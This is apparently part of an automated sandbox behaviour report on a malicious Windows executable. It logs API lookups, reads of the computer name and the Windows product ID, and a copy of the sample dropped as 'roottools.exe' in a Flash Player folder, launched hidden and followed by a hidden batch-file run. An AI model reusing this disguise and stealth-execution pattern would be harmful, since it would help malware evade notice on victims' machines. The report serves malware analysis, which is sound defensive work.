| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, base_address = 0x400000 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId |
|
1 | |
| System | Get Info | type = Operating System |
|
3 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x77cd00a4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x77ccf9d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77cd1314 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x77cd19b0 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = \??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = extended |
|
1 | |
| Mutex | Create | mutex_name = 9B4D68961731FE3C22DA08B640799EB6 |
|
1 | |
| Mutex | Open | mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE |
|
1 | |
| File | Create | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| File | Write | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4 |
|
1 | |
| File | Read | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4, size_out = 4 |
|
1 | |
| File | Read | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 766, size_out = 766 |
|
1 | |
| File | Create | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| File | Write | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4 |
|
1 | |
| File | Read | filename = \\.\pipe\D3B6C4DE8CF79A854B549EE232F08C89, size = 4, size_out = 4 |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = size, size_out = 196608 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 196608, size_out = 196608 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming, type = time |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:58 (UTC) |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ |
|
1 | |
| Process | Create | process_name = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", os_pid = 0x7e8, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Mutex | Release | mutex_name = 9B4D68961731FE3C22DA08B640799EB6 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, size = 216 |
|
1 | |
| Environment | Get Environment String | name = ComSpec, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Process | Create | process_name = "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat", os_pid = 0x6a4, creation_flags = CREATE_DEFAULT_ERROR_MODE, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Roaming\ |
| Monitor | Start Time: 00:05:28, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:45 |
| Information | Value |
|---|---|
| PID | 0x7e8 |
| Parent PID | 0x594 (c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7B4
0x
6A8
0x
114
0x
718
0x
7B0
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00226fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x00247fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x003b0000 | 0x003ebfff | Memory Mapped File | Readable |
|
|
|
|
| roottools.exe | 0x00400000 | 0x00432fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0041bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000620000 | 0x00620000 | 0x006fefff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000780000 | 0x00780000 | 0x00907fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000910000 | 0x00910000 | 0x00a90fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x01e9ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ea0000 | 0x01ea0000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x022a0000 | 0x0256efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002570000 | 0x02570000 | 0x0278ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002570000 | 0x02570000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002570000 | 0x02570000 | 0x025effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025f0000 | 0x025f0000 | 0x026effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000026f0000 | 0x026f0000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002750000 | 0x02750000 | 0x0278ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002790000 | 0x02790000 | 0x02b82fff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02b90000 | 0x034bffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000034c0000 | 0x034c0000 | 0x0364ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000034c0000 | 0x034c0000 | 0x035dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003610000 | 0x03610000 | 0x0364ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003650000 | 0x03650000 | 0x0b64ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x000000000b750000 | 0x0b750000 | 0x0b84ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000000b850000 | 0x0b850000 | 0x0b94ffff | Private Memory | Readable, Writable |
|
|
|
|
| msvbvm60.dll | 0x72940000 | 0x72a92fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwmapi.dll | 0x74130000 | 0x74142fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x741b0000 | 0x7422ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sxs.dll | 0x74e30000 | 0x74e8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dhcpcsvc.dll | 0x74fd0000 | 0x74fe1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75630000 | 0x7566afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75670000 | 0x75685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x75690000 | 0x75697fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x756b0000 | 0x756cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x756e0000 | 0x756e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x75ad0000 | 0x75ad4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75ae0000 | 0x75c3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x75c40000 | 0x75e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75f20000 | 0x76014fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x761b0000 | 0x7623efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76240000 | 0x7635cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76360000 | 0x7636bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76370000 | 0x763c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76690000 | 0x767c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x767f0000 | 0x767f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76a70000 | 0x776b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
